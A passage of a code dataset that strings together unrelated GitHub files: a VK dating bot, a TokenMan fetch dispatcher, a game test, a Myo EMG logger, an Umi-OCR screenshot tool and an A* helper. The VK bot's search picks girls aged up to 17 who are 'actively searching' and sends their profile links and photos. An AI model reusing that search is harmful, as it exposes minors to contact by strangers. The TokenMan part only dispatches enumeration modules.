get_user_search():\n\n fields = session.method(\"users.search\", {\n \"fields\": ['city,sex,photo_400_orig,bdate,domain,activities,photo_id'],\n \"count\": \"5\",\n \"sex\": int('1'),\n \"age_to\": 17,\n \"status\": 6,\n 'hometown': 'Краснодар',\n 'offset': 0\n\n })\n\n # pprint(fields['items'])\n for domain in fields['items']:\n user_id = domain['id']\n domains = domain['domain']\n photos = domain['photo_id']\n\n # pprint(photos)\n # print(f'Ссылка на профиль: https://vk.com/{domains}')\n\n photo = 'photo{}_{}'.format(photos, user_id)\n links = f'Ссылка на профиль: https://vk.com/{domains}'\n\n return photo, links\n\n\npprint(get_user_search())\n\n\ndef write_msg(user_id, message):\n vk.method('messages.send', {'user_id': user_id, 'message': message, 'random_id': randrange(10 ** 7),\n 'attachment': ','.join(attachments)\n })\n\n\nfor event in longpoll.listen():\n\n # Если пришло новое сообщение\n if event.type == VkEventType.MESSAGE_NEW:\n if event.to_me:\n # Сообщение от пользователя(прослушивание)\n request = event.text.lower()\n attachments = []\n # photo = attachments.append(get_user_search()[0])\n #\n\n if request == \"привет\":\n write_msg(event.user_id, f\"Хай, {event.user_id}\")\n write_msg(event.user_id, \"Это бот! Введи 'Профиль!'\")\n elif request == \"профиль\":\n write_msg(event.user_id, get_user_search()[1])\n write_msg(event.user_id, attachments.append(get_user_search()[0]))\n elif request == \"пока\":\n write_msg(event.user_id, \"Пока((\")\n elif request == \"help\":\n write_msg(event.user_id,\n \"\"\"\n возраст: до \n положительное число\n \n пол: \n 1 — женщина;\n 2 — мужчина;\n 0 — лю��ой (по умолчанию)\n \n город:\n название города строкой\n Ye gjcvj\n семейное положение: \n 1 — не женат (не замужем);\n 2 — встречается;\n 3 — помолвлен(-а);\n 4 — женат (замужем);\n 5 — всё сложно;\n 6 — в активном поиске;\n 7 — влюблен(-а);\n 8 — в гражданском браке.\n \"\"\")\n else:\n write_msg(event.user_id, 'Введи \"help\" для вызова команд для меня!')\n","repo_name":"Alexnor1104/Coursework_VKinder","sub_path":"checking_code/vk_users.py","file_name":"vk_users.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33370785439","text":"from tokenman.fetch.applications import Applications\nfrom tokenman.fetch.drives import Drives\nfrom tokenman.fetch.emails import Emails\nfrom tokenman.fetch.groups import Groups\nfrom tokenman.fetch.organizations import Organizations\nfrom tokenman.fetch.serviceprincipals import ServicePrincipals\nfrom tokenman.fetch.users import Users\nfrom tokenman.state import RunState\nfrom typing import List\n\n\nclass Fetch:\n \"\"\"Fetch command handler\"\"\"\n\n @classmethod\n def run(\n cls,\n state: RunState,\n modules: List[str],\n ):\n \"\"\"Run the 'fetch' command\n\n :param state: run state\n :param modules: fetch modules to run\n \"\"\"\n # Run each module based on the provided flag data from the user\n if any(m in modules for m in [\"users\", \"all\"]):\n Users.fetch(state)\n\n if any(m in modules for m in [\"groups\", \"all\"]):\n Groups.fetch(state)\n\n if any(m in modules for m in [\"organizations\", \"all\"]):\n Organizations.fetch(state)\n\n if any(m in modules for m in [\"emails\", \"all\"]):\n Emails.fetch(state)\n\n if any(m in modules for m in [\"applications\", \"all\"]):\n Applications.fetch(state)\n\n if any(m in modules for m in [\"serviceprincipals\", \"all\"]):\n ServicePrincipals.fetch(state)\n\n if any(m in modules for m in [\"drives\", \"all\"]):\n Drives.fetch(state)\n","repo_name":"secureworks/TokenMan","sub_path":"tokenman/fetch/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"52"} +{"seq_id":"26653707574","text":"import unittest\n\nfrom roverchip.levels.chipschallenge import ChipsChallenge\n\nfrom roverchip.test.test_level import MockDataFile\n\n\nclass Test_ChipDoor(unittest.TestCase):\n def setUp(self):\n cells = [[0, 0, 0]]\n ctypes = [('Floor',)]\n self.level = ChipsChallenge(MockDataFile(cells, ctypes))\n\n self.player = self.level.add_sprite('Player', (0, 0))\n self.chipdoor = self.level.add_sprite('ChipDoor', (1, 0))\n self.player.carrying.add(self.level.add_sprite('Chip', (0, 0)))\n\n\n def test_chipdoor_opens_if_chip_quota_met(self):\n self.level.chipquota = 1\n self.player.attempt_move(1)\n self.assertFalse(self.chipdoor.is_solid)\n\n\n def test_chipdoor_doesnt_open_if_chip_quota_not_met(self):\n self.level.chipquota = 2\n self.player.attempt_move(1)\n self.assertTrue(self.chipdoor.is_solid)\n","repo_name":"saltire/roverchip-tdd","sub_path":"roverchip/sprites/test/test_chipdoor.py","file_name":"test_chipdoor.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7410529048","text":"\"\"\"\r\nRecord orientation and EMG data from Myo and log in a text file. \r\n\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nfrom myo.utils import TimeInterval\r\nimport myo\r\nimport collections\r\n\r\nclass Listener(myo.DeviceListener):\r\n\r\n def __init__(self):\r\n self.interval = TimeInterval(None, 0.05)\r\n self.orientation = None\r\n self.pose = myo.Pose.rest # unused\r\n self.emg_enabled = True\r\n self.locked = False\r\n self.rssi = None\r\n self.emg = None\r\n\r\n def output(self):\r\n if not self.interval.check_and_reset():\r\n return \r\n \r\n sample_parameters = collections.deque(maxlen=2)\r\n sample_limit = 50\r\n \r\n with open(\"sample_parameters.txt\") as file_sampleParam:\r\n for line in file_sampleParam:\r\n for num in line.split(','):\r\n sample_parameters.append(int(num))\r\n \r\n sample_count = sample_parameters[0]\r\n sample_number = sample_parameters[1]\r\n \r\n if sample_count == sample_limit:\r\n contVar = int(input(\"Do you want to continue? \"))\r\n if contVar == 1:\r\n sample_number = sample_number + 1\r\n sample_count = 0\r\n else:\r\n pass\r\n \r\n else: \r\n \r\n quat_w = open(\"quaternion_w\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_i = open(\"quaternion_i\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_j = open(\"quaternion_j\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n quat_k = open(\"quaternion_k\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n \r\n emgPod_1 = open(\"emgPod1\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n emgPod_2 = open(\"emgPod2\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_3 = open(\"emgPod3\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_4 = open(\"emgPod4\" + \"_\" + str(sample_number) + \".txt\", \"a+\")\r\n emgPod_5 = open(\"emgPod5\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_6 = open(\"emgPod6\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_7 = open(\"emgPod7\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n emgPod_8 = open(\"emgPod8\" + \"_\" + str(sample_number) + \".txt\", \"a+\") \r\n \r\n quaternions_read = collections.deque(maxlen=4) \r\n instances_quat = 4\r\n emg_read = collections.deque(maxlen=8)\r\n instances_emg = 8\r\n \r\n if self.orientation and self.emg:\r\n \r\n for element in self.orientation:\r\n quaternions_read.append(element)\r\n instances_quat = instances_quat - 1\r\n if instances_quat == 0:\r\n quat_w.write(str(quaternions_read[0]) + ' ')\r\n quat_i.write(str(quaternions_read[1]) + ' ') \r\n quat_j.write(str(quaternions_read[2]) + ' ')\r\n quat_k.write(str(quaternions_read[3]) + ' ')\r\n \r\n for element in self.emg:\r\n emg_read.append(element)\r\n instances_emg = instances_emg - 1\r\n if instances_emg == 0:\r\n emgPod_1.write(str(emg_read[0]) + ' ')\r\n emgPod_2.write(str(emg_read[1]) + ' ') \r\n emgPod_3.write(str(emg_read[2]) + ' ')\r\n emgPod_4.write(str(emg_read[3]) + ' ')\r\n emgPod_5.write(str(emg_read[4]) + ' ')\r\n emgPod_6.write(str(emg_read[5]) + ' ')\r\n emgPod_7.write(str(emg_read[6]) + ' ')\r\n emgPod_8.write(str(emg_read[7]) + ' ') \r\n \r\n sample_count = sample_count + 1\r\n \r\n #print(quaternions_read)\r\n #print(emg_read)\r\n \r\n quat_w.close()\r\n quat_i.close()\r\n quat_j.close()\r\n quat_k.close()\r\n \r\n emgPod_1.close()\r\n emgPod_2.close()\r\n emgPod_3.close()\r\n emgPod_4.close()\r\n emgPod_5.close()\r\n emgPod_6.close()\r\n emgPod_7.close()\r\n emgPod_8.close()\r\n \r\n file_sampleParam = open(\"sample_parameters.txt\", \"w\")\r\n file_sampleParam.write(str(sample_count) + ',' + str(sample_number))\r\n file_sampleParam.close()\r\n \r\n def on_connected(self, event):\r\n event.device.request_rssi()\r\n event.device.stream_emg(True)\r\n\r\n def on_rssi(self, event):\r\n self.rssi = event.rssi\r\n self.output()\r\n\r\n def on_pose(self, event):\r\n self.pose = event.pose\r\n self.output()\r\n\r\n def on_orientation(self, event):\r\n self.orientation = event.orientation\r\n self.output()\r\n\r\n def on_emg(self, event):\r\n self.emg = event.emg\r\n self.output()\r\n \r\n def on_unlocked(self, event):\r\n self.locked = False\r\n self.output()\r\n\r\n def on_locked(self, event):\r\n self.locked = True\r\n self.output()\r\n\r\n \r\nif __name__ == '__main__':\r\n \r\n myo.init('myo-sdk-win-0.9.0/bin/myo64.dll')\r\n hub = myo.Hub()\r\n listener = Listener()\r\n while hub.run(listener.on_event, 500):\r\n pass\r\n","repo_name":"jpdayrit/Design-of-Sign-AI-An-AI-Based-ASL-Translator","sub_path":"Scripts/Myo_DataCollect.py","file_name":"Myo_DataCollect.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25432340064","text":"from utils.logger import GetLog\nfrom utils.config import Config, ScsModeFlag\nfrom utils.tool import Tool\nfrom utils.hotkey import Hotkey # 快捷键\nfrom ui.win_notify import NotifyClose # 关闭通知弹窗\nfrom ui.win_show_image import ShowImage # 显示图片窗口\n\n# 获取显���器信息\nfrom win32api import EnumDisplayMonitors, GetMonitorInfo\nfrom win32gui import CreateDC\nfrom win32print import GetDeviceCaps\n# 剪贴板\nfrom io import BytesIO\nfrom win32clipboard import OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, CF_DIB\n\nimport tkinter as tk\nfrom PIL import ImageGrab, ImageTk\nfrom enum import Enum\n\n# TODO :\n# The screenshot module works by first getting a complete screenshot of the virtual screen (all the monitors' frames put together). Then create a canvas that\n# The starting point of the canvas (top-left corner) is the top-left corner of the virtual screen (xy may be negative), the width of the canvas is the width of the virtual screen, # and then display the full screenshot on the canvas.\n# Then display the full screenshot on the canvas, listening for user presses and drags. The position of the screenshot on the canvas should correspond to the real screen.\n# But the problem is that the canvas, as a window, has a scaling of its own (i.e. the scaling of the screen it was born on).\n# If the scaling ratio of one of the multiple screens does not match the scaling ratio of the canvas, their logical coordinates will be misaligned under a certain alignment, which is manifested as a misaligned screen.\n# I was hoping to get the physical and logical resolutions of all the screens, get their scaling ratios, and then calculate the \"true\" logical coordinates in the canvas coordinate system.\n# But I couldn't figure it out. There are too many factors involved.\n# The way the screen is arranged, the state of the software when you click on it, the position of the canvas when it is created ...... can all affect the logical coordinates and the logical resolution, # making it very difficult to calculate the logical coordinates of the canvas.\n# making it difficult to calculate the anchor points and ratios that should be corrected for the screen in the canvas coordinate system.\n\nLog = GetLog()\n\n\ndef _ScreenshotClose(flag, errMsg=None):\n Log.info('End of Screenshot')\n Config.main.closeScreenshot(flag, errMsg)\n\n\ndef ScreenshotCopy():\n '''Take a screenshot, save it to the clipboard, and then call the main window's close Screenshot interface.'''\n NotifyClose() # 关闭通知弹窗\n scsMode = Config.get('scsMode').get(Config.get(\n 'scsModeName'), ScsModeFlag.multi) # 当前截屏模式\n if scsMode == ScsModeFlag.multi: # 内置截图模式\n SSWin.startGrab()\n elif scsMode == ScsModeFlag.system: # 系统截图模式\n SSSys.startGrab()\n else:\n _ScreenshotClose(False, '未知的截图模式!')\n\n\nclass ScreenshotSys(): # 系统截图模式\n\n def __init__(self):\n self.isInitKey = False\n self.isWorking = False\n self.checkTimeMax = 10 # 最大检查次数\n self.checkTimeRate = 20 # 检查间隔频率,毫秒\n self.checkTime = 0 # 当前剩余检查次数\n self.position = (0, 0)\n\n def startGrab(self): # 启动截屏\n '''启动系统截图。若通过快捷键进入,必须为win+shift+S'''\n Tool.emptyClipboard() # 清空剪贴板\n self.isWorking = True\n if not self.isInitKey:\n self.__initKey()\n if not Hotkey.isPressed('win'): # 不是通过快捷键进入\n Hotkey.send('win+shift+s') # 发送系统截图快捷键\n Log.info('System Screenshot Launch')\n\n def __initKey(self): # 初始化监听\n # 绑定全局事件\n Hotkey.addRelease( # Esc抬起,系统截图失败\n 'esc', lambda: self.__close(False))\n Hotkey.addMouseButtonDown(self.__onDown) # 注册监听鼠标左/右按下\n Hotkey.addMouseButtonUp(self.__onUp) # 注册监听鼠标左/右抬起\n self.isInitKey = True\n\n def __onDown(self, pos): # 用户操作开始\n if self.isWorking:\n self.position = pos # 获取鼠标当前位置\n\n def __onUp(self, pos): # 用户操作结束\n if self.isWorking:\n if self.position == pos: # 鼠标起始结束位置相同,截图失败\n self.__close(False)\n return\n self.checkTime = 0\n self.__checkClipboard()\n\n def __checkClipboard(self): # 检查剪贴板中是否已存在截图\n if self.checkTime >= self.checkTimeMax:\n self.__close(False, 'Failed to read clipboard') # 检查次数超限,截图失败\n return\n clipData = Tool.getClipboardFormat() # 读取剪贴板\n if clipData == 2: # The system screenshot has been saved to the clipboard memory, the screenshot is successful!\n Log.info(f' The first {self.checkTime} check')\n if Config.get('isShowImage'): # 显示图片展示窗\n ShowImage(imgPIL=ImageGrab.grabclipboard())\n self.__close(False)\n else:\n self.__close(True)\n return\n Log.info(f' The first {self.checkTime} check')\n self.checkTime += 1\n # 定时器指定下一轮查询\n Config.main.win.after(self.checkTimeRate, self.__checkClipboard)\n\n def __close(self, flag=False, errMsg=None): # 退出\n if self.isWorking:\n Hotkey.removeMouse() # 注销监听鼠标\n self.isInitKey = False\n self.isWorking = False\n _ScreenshotClose(flag, errMsg)\n\n\nSSSys = ScreenshotSys()\n\n\nclass _DrawMode(Enum):\n ready = 1 # 准备中\n drag = 2 # 拖拽中\n\n\nclass ScreenshotWin(): # 内置截图模式\n OB = -100 # 元素隐藏屏幕外的位置\n\n def __init__(self):\n self.isInitWin = False # 防止重复初始化窗体\n self.isInitGrab = False # 防止未初始化截图参数时触发事件\n self.errMsg = None # 记录错误,传给调用者\n self.screenScaleList = None # 记录各个屏幕分别的缩放比例\n self.promptSss = True # 本次使用期间显示缩放提示\n self.lastScInfos = None # 上一轮的屏幕参数\n\n def startGrab(self): # 启动截屏\n '''启动区域截图'''\n # “虚拟屏幕”指多显示器画面的拼凑在一起的完整画面\n self.image = ImageGrab.grab(all_screens=True) # 对整个虚拟屏幕截图,物理分辨率\n\n if not self.isInitWin:\n self.__initWin()\n\n self.imageResult = None # 结果图片\n self.sourceBox = None # 截图包围盒原始信息\n self.drawMode = _DrawMode.ready # 准备模式\n # 获取所有屏幕的信息,提取其中的坐标信息(虚拟,非物理分辨率)\n scInfos = EnumDisplayMonitors() # 所有屏幕的信息\n self.scBoxList = [s[2] for s in scInfos] # 提取虚拟分辨率的信息\n # 计算缩放比例,若不一致,则发送提示弹窗\n # 条件:需要提示 | 大于一块屏幕时 | 本次信息与上次不同 | 设置需要提示\n scInfosLen = len(scInfos)\n if self.promptSss and scInfosLen > 1 and not self.lastScInfos == scInfos and Config.get('promptScreenshotScale'):\n scList = []\n self.lastScInfos = scInfos # 屏幕信息与上次一样时跳过检测,减少耗时\n # 提取所有屏幕缩放比例\n for index, sc in enumerate(scInfos):\n # 获取设备信息字典,得到设备名称 Device\n # 物理设备信息(dict) = GetMonitorInfo(hMonitor)\n info = GetMonitorInfo(scInfos[index][0])\n # 为显示设备创建设备上下文,得到物理设备句柄 hDC\n # 设备句柄(int) = CreateDC (设备名称, 设备名称 , None )\n hDC = CreateDC(info['Device'], info['Device'], None)\n w = GetDeviceCaps(hDC, 118) # 常量 win32con.DESKTOPHORZRES\n # h = GetDeviceCaps(hDC, 117) # 常量 win32con.DESKTOPVERTRES\n # 得到缩放比,即windows的“更改文本、应用等项目的大小”\n s = w / (sc[2][2]-sc[2][0])\n scList.append(s)\n # 检查缩放比例是否一致\n isEQ = True\n for i in range(1, scInfosLen):\n if not abs(scList[i] - scList[0]) < 0.001:\n isEQ = False\n break\n # 不一致,提示\n if not isEQ:\n self.screenScaleList = scList\n msg = f'''You are currently using {scInfosLen} blocks of screens with inconsistent scaling, respectively {scList} 。\n\nIt may result in abnormal Umi-OCR screenshots, such as incomplete screen, distorted window, no text recognised, and so on.\nIf this happens.\nPlease adjust all screens to the same value in the system settings [Change the size of text, application and other items].\nOr, please switch the screenshot mode to [Windows System Screenshot] in the software settings. \\n'''\n Config.main.panelOutput(msg)\n Config.main.notebook.select(\n Config.main.notebookTab[1]) # 转到输出卡\n if tk.messagebox.askyesno('draw attention to sth.',\n f'{msg}\\nClick [Yes] if you will not be prompted again for this use, or [No] if you will not be prompted permanently.'):\n self.promptSss = False\n else:\n Config.set('promptScreenshotScale', False, isSave=True)\n # 计算虚拟屏幕最左上角和最右下角的坐标\n scUp, scDown, scLeft, scRight = 0, 0, 0, 0\n for s in self.scBoxList: # 遍历所有屏幕,获取最值\n if s[0] < scLeft: # 左边缘\n scLeft = s[0]\n if s[1] < scUp: # 上边缘\n scUp = s[1]\n if s[2] > scRight: # 右边缘\n scRight = s[2]\n if s[3] > scDown: # 下边缘\n scDown = s[3]\n # 计算虚拟屏幕的宽和高,请确保屏幕对齐\n scWidth, scHeight = scRight - scLeft, scDown - scUp\n # 多显示器处理完毕\n self.scBoxVirtual = (scLeft, scUp, scRight, scDown,\n scWidth, scHeight)\n self.allScale = self.image.size[0] / scWidth # 整个虚拟屏幕的缩放比例\n # 主窗口设置为铺满虚拟屏幕\n bd, bdp = 2, 1 # 边缘要额外拓展1像素,以免无法接收到鼠标在边缘的点击\n scStr = f'{scWidth+bd}x{scHeight+bd}+{scLeft-bdp}+{scUp-bdp}'\n # print(f'缩放比:{self.allScale}')\n # self.topwin.tk.call('tk', 'scaling', self.allScale/75)\n self.topwin.geometry(scStr)\n self.canvas['width'] = scWidth+bd\n self.canvas['height'] = scHeight+bd\n # 原图改物理为虚拟屏幕分辨率,转成tk格式,导入画布\n self.imageTK = ImageTk.PhotoImage(\n self.image.resize((scWidth, scHeight)))\n cimg = self.canvas.create_image( # 底图\n bdp, bdp, anchor='nw', image=self.imageTK)\n self.canvas.lower(cimg) # 移动到最下方\n\n self.topwin.deiconify() # 显示窗口\n self.isInitGrab = True\n Log.info('初始化截图')\n self.__flash() # 闪光\n if Config.get('isDebug'): # 显示debug信息\n c = 2 if self.debugList else 1 # 若上一轮已显示,则调用两次以刷新\n for i in range(c): # 否则,调用一次以打开\n self.__switchDebug()\n\n def __initWin(self): # 初始化窗体\n self.isInitWin = True\n # 创建窗口\n self.topwin = tk.Toplevel()\n self.topwin.withdraw() # 隐藏窗口\n self.topwin.overrideredirect(True) # 无边框\n self.topwin.configure(bg='black')\n # self.topwin.attributes(\"-alpha\", 0.8) # 透明(调试用)\n self.topwin.attributes('-topmost', 1) # 设置层级最前\n # 创建画布及画布元素。后创建的层级在上。\n self.canvas = tk.Canvas(self.topwin, cursor='plus', bg=None,\n highlightthickness=0, borderwidth=0) # 取消边框\n self.canvas.pack(fill='both')\n # 瞄准盒\n rec1 = self.canvas.create_rectangle( # 实线底层\n self.OB, self.OB, self.OB, self.OB, outline=Config.get('scsColorBoxDown'), width=2)\n rec2 = self.canvas.create_rectangle( # 虚线表层\n self.OB, self.OB, self.OB, self.OB, outline=Config.get('scsColorBoxUp'), width=2, dash=10)\n self.sightBox = (rec1, rec2)\n self.sightBoxXY = [self.OB, self.OB, self.OB, self.OB] # 瞄准盒坐标\n # 瞄准线\n lineColor = Config.get('scsColorLine')\n lineW = self.canvas.create_line( # 纵向\n self.OB, self.OB, self.OB, self.OB, fill=lineColor, width=1)\n lineH = self.canvas.create_line( # 横向\n self.OB, self.OB, self.OB, self.OB, fill=lineColor, width=1)\n self.sightLine = (lineW, lineH)\n # debug模块\n self.debugXYBox = self.canvas.create_rectangle( # 坐标下面的底\n self.OB, self.OB, self.OB, self.OB, fill='yellow', outline='#999', width=1)\n self.debugXYText = self.canvas.create_text(self.OB, self.OB, # 显示坐标\n font=('Malgun Gothic', 15, 'bold'), fill='red', anchor='nw')\n self.debugList = [] # 显示屏幕信息\n # 闪光模块\n self.flashList = [] # 闪光元素\n # 绑定全局事件\n Hotkey.add('esc', self.__onClose) # 绑定Esc退出\n Hotkey.add('ctrl+shift+alt+d', self.__switchDebug) # 切换调试信息\n # 方向键控制鼠标移动\n Hotkey.add('up', lambda: self.__keyMotion(0, -1))\n Hotkey.add('down', lambda: self.__keyMotion(0, 1))\n Hotkey.add('left', lambda: self.__keyMotion(-1, 0))\n Hotkey.add('right', lambda: self.__keyMotion(1, 0))\n # 绑定画布事件\n self.canvas.bind('', self.__onDown) # 左键按下\n self.canvas.bind('', self.__repaint) # 右键按下\n self.canvas.bind('', self.__onUp) # 左键松开\n self.canvas.bind('', self.__onMotion) # 鼠标移动\n self.canvas.bind('', self.__onMotion) # 鼠标进入,用于初始化瞄准线\n Log.info('Umi Screenshot Launch')\n\n def __hideElement(self, ele, size=4): # 隐藏一个画布元素\n # 实际上是挪到画布外\n if size == 2:\n self.canvas.coords(ele, self.OB, self.OB)\n elif size == 4:\n self.canvas.coords(ele, self.OB, self.OB, self.OB, self.OB)\n\n def __onDown(self, event): # 鼠标按下\n if self.drawMode == _DrawMode.ready: # 进入拖拽模式\n self.drawMode = _DrawMode.drag\n # 记录起始点\n self.sightBoxXY[0], self.sightBoxXY[1] = event.x, event.y\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n # 隐藏瞄准线\n for i in (0, 1):\n self.__hideElement(self.sightLine[i], 4)\n\n def __onUp(self, event): # 鼠标松开\n if self.drawMode == _DrawMode.drag: # 离开拖拽模式\n self.drawMode = _DrawMode.ready\n # 记录结束点\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n self.__createGrabImg() # 生成剪切图像\n self.__onClose() # 关闭窗口\n\n def __onMotion(self, event): # 鼠标移动\n if self.drawMode == _DrawMode.ready: # 准备模式,刷新瞄准线\n self.canvas.coords(self.sightLine[0],\n 0, event.y, self.scBoxVirtual[4], event.y)\n self.canvas.coords(self.sightLine[1],\n event.x, 0, event.x, self.scBoxVirtual[5])\n elif self.drawMode == _DrawMode.drag: # 拖拽模式,刷新瞄准盒\n self.sightBoxXY[2], self.sightBoxXY[3] = event.x, event.y\n for i in (0, 1):\n self.canvas.coords(self.sightBox[i],\n self.sightBoxXY[0], self.sightBoxXY[1], event.x, event.y)\n if self.debugList:\n self.canvas.coords(self.debugXYText, event.x+6, event.y+3)\n self.canvas.coords(self.debugXYBox, event.x+3,\n event.y+3, event.x+130, event.y+28)\n # self.canvas.itemconfig(self.debugXYText, {'text':\n # f'{event.x} , {event.y}'})\n self.canvas.itemconfig(self.debugXYText, {'text':\n f'{event.x_root} , {event.y_root}'})\n\n def __keyMotion(self, x, y): # 键盘控制鼠标移动\n if not self.isInitGrab:\n return\n pos = Hotkey.getMousePos()\n pos = (pos[0]+x, pos[1]+y)\n Hotkey.setMousePos(pos)\n\n def __repaint(self, event): # 重绘\n Log.info('repaint')\n if self.drawMode == _DrawMode.drag: # 已在拖拽中\n self.drawMode = _DrawMode.ready # 退出拖拽模式\n self.sightBoxXY = [self.OB, self.OB, self.OB, self.OB]\n for i in (0, 1): # 隐藏瞄准盒,显示瞄准线\n self.__hideElement(self.sightBox[i], 4)\n self.canvas.coords(self.sightLine[0],\n 0, event.y, self.scBoxVirtual[4], event.y)\n self.canvas.coords(self.sightLine[1],\n event.x, 0, event.x, self.scBoxVirtual[5])\n elif self.drawMode == _DrawMode.ready: # 还在准备中\n self.__onClose() # 关闭\n\n def __createGrabImg(self): # 创建剪切图像\n box = self.sightBoxXY\n if box[0] < 0 and box[1] < 0 and box[2] < 0 and box[3] < 0:\n pass # 未截图\n elif box[0] == box[2] or box[1] == box[3]:\n pass # 截图面积为0,无效\n else:\n if box[0] > box[2]: # 若坐标错位(第二点不在第一点右下角)则交换\n box[0], box[2] = box[2], box[0]\n if box[1] > box[3]:\n box[1], box[3] = box[3], box[1]\n self.sourceBox = tuple(box) # 记录缩放比例之前的原始box值\n for i in range(4):\n box[i] *= self.allScale # 乘上缩放比例\n self.imageResult = self.image.crop(box) # 裁切,产生最终截图数据\n\n def __onClose(self, event=None): # 关闭窗口\n if not self.isInitGrab:\n return\n # 隐藏元素\n for i in (0, 1):\n self.__hideElement(self.sightBox[i])\n self.__hideElement(self.sightLine[i])\n self.topwin.withdraw() # 隐藏窗口\n # 初始化参数\n self.isInitGrab = False\n self.drawMode = _DrawMode.ready\n self.errMsg = None\n flag = self.copyImage() # 复制图像\n self.image = None # 删除图像\n self.imageResult = None # 删除\n _ScreenshotClose(flag, self.errMsg)\n\n def __flash(self): # 边缘闪光,提示已截图\n color = 'white'\n width = 100\n\n def closeFlash(): # 关闭闪光\n for i in self.flashList:\n self.canvas.delete(i)\n self.flashList = []\n\n for box in self.scBoxList:\n p1x, p1y, p2x, p2y = box\n p1x -= self.scBoxVirtual[0]\n p2x -= self.scBoxVirtual[0]\n p1y -= self.scBoxVirtual[1]\n p2y -= self.scBoxVirtual[1]\n e = self.canvas.create_rectangle(\n p1x, p1y, p2x, p2y, outline=color, width=width)\n self.flashList.append(e)\n self.topwin.after(200, closeFlash)\n\n def __switchDebug(self, event=None): # 切换显示/隐藏调试信息\n if not self.isInitGrab:\n return\n color = 'red'\n if self.debugList: # 删除调试信息\n Config.set('isDebug', False)\n for i in self.debugList:\n self.canvas.delete(i)\n self.debugList = []\n self.__hideElement(self.debugXYBox, 4)\n self.__hideElement(self.debugXYText, 2)\n else: # 创建调试信息\n Config.set('isDebug', True)\n for index, box in enumerate(self.scBoxList):\n p1x, p1y, p2x, p2y = box\n p1x -= self.scBoxVirtual[0]\n p2x -= self.scBoxVirtual[0]\n p1y -= self.scBoxVirtual[1]\n p2y -= self.scBoxVirtual[1]\n e = self.canvas.create_rectangle(\n p1x, p1y, p2x, p2y, outline=color, width=3)\n self.debugList.append(e)\n e = self.canvas.create_line(\n p1x, p1y, p2x, p2y, fill=color, width=3)\n self.debugList.append(e)\n e = self.canvas.create_line(\n p2x, p1y, p1x, p2y, fill=color, width=3)\n self.debugList.append(e)\n # 文字提示框\n e = self.canvas.create_rectangle(\n p1x+10, p1y+10, p1x+440, p1y+60, fill='white', width=0)\n self.debugList.append(e)\n e = self.canvas.create_text(p1x+15, p1y+15,\n font=('', 15, 'bold'), fill=color, anchor='nw',\n text=f'screen{index+1}: {box} | {box[2]-box[0]},{box[3]-box[1]}')\n self.debugList.append(e)\n e = self.canvas.create_text(p1x+15, p1y+43,\n font=('', 10, ''), fill=color, anchor='nw',\n text=f'Press Ctrl+Shift+Alt+D to exit debug mode')\n self.debugList.append(e)\n self.canvas.lift(self.debugXYBox) # 移动到最上方\n self.canvas.lift(self.debugXYText) # 移动到最上方\n\n def copyImage(self):\n '''复制截图到剪贴板。成功返回True,否则False'''\n if not self.imageResult:\n return False\n # 图片转字节\n output = BytesIO()\n self.imageResult.save(output, 'BMP') # 以位图保存\n imgData = output.getvalue()[14:] # 去除header\n output.close()\n if Config.get('isShowImage'): # 显示图片展示窗\n b = self.sourceBox\n p = (b[0], b[1], b[2]-b[0], b[3]-b[1])\n ShowImage(imgPIL=self.imageResult, imgData=imgData, initPos=p)\n return False\n else: # 直接识别\n try:\n OpenClipboard() # 打开剪贴板\n EmptyClipboard() # 清空剪贴板\n SetClipboardData(CF_DIB, imgData) # 写入\n except Exception as err:\n self.errMsg = f'The bitmap cannot be written to the clipboard, please detect if another programme is occupying it. \\n{err}'\n return False\n finally:\n try:\n CloseClipboard() # 关闭\n except Exception as err:\n self.errMsg = f'Unable to close clipboard. \\n{err}'\n return False\n return True\n\n\nSSWin = ScreenshotWin()\n\n# class e:\n# def __init__(self, x, y):\n# self.x = x\n# self.y = y\n# self.__onDown(e(0, 0))\n# self.__onUp(e(50, 20))\n\n# 虚拟屏幕总尺寸 win32api.GetSystemMetrics\n# virtualX = GetSystemMetrics(78) # 常量 win32con.SM_CXVIRTUALSCREEN\n# virtualY = GetSystemMetrics(79) # 常量 win32con.SM_CYVIRTUALSCREEN\n# print(f'虚拟尺寸:{virtualX} {virtualY}\\n真实尺寸:{self.image.size}')\n# print(f'总缩放比例:{self.image.size[0]/virtualX}')\n","repo_name":"theangkko/Umi-OCR","sub_path":"ui/win_screenshot.py","file_name":"win_screenshot.py","file_ext":"py","file_size_in_byte":23920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15386360021","text":"\r\n#heuristics function.\r\n#--Manhattan distance\r\ndef h(p1, p2):\r\n\tx1, y1 = p1\r\n\tx2, y2 = p2\r\n\treturn abs(x1 - x2) + abs(y1 - y2)\r\n\r\n#get position where we clicked\r\ndef get_clicked_pos(pos, rows, width):\r\n\tgap = width // rows\r\n\ty, x = pos\r\n\r\n\trow = y // gap\r\n\tcol = x // gap\r\n\r\n\treturn row, col","repo_name":"Renwarren/Astar-Visualizer","sub_path":"A-star Pathfinding 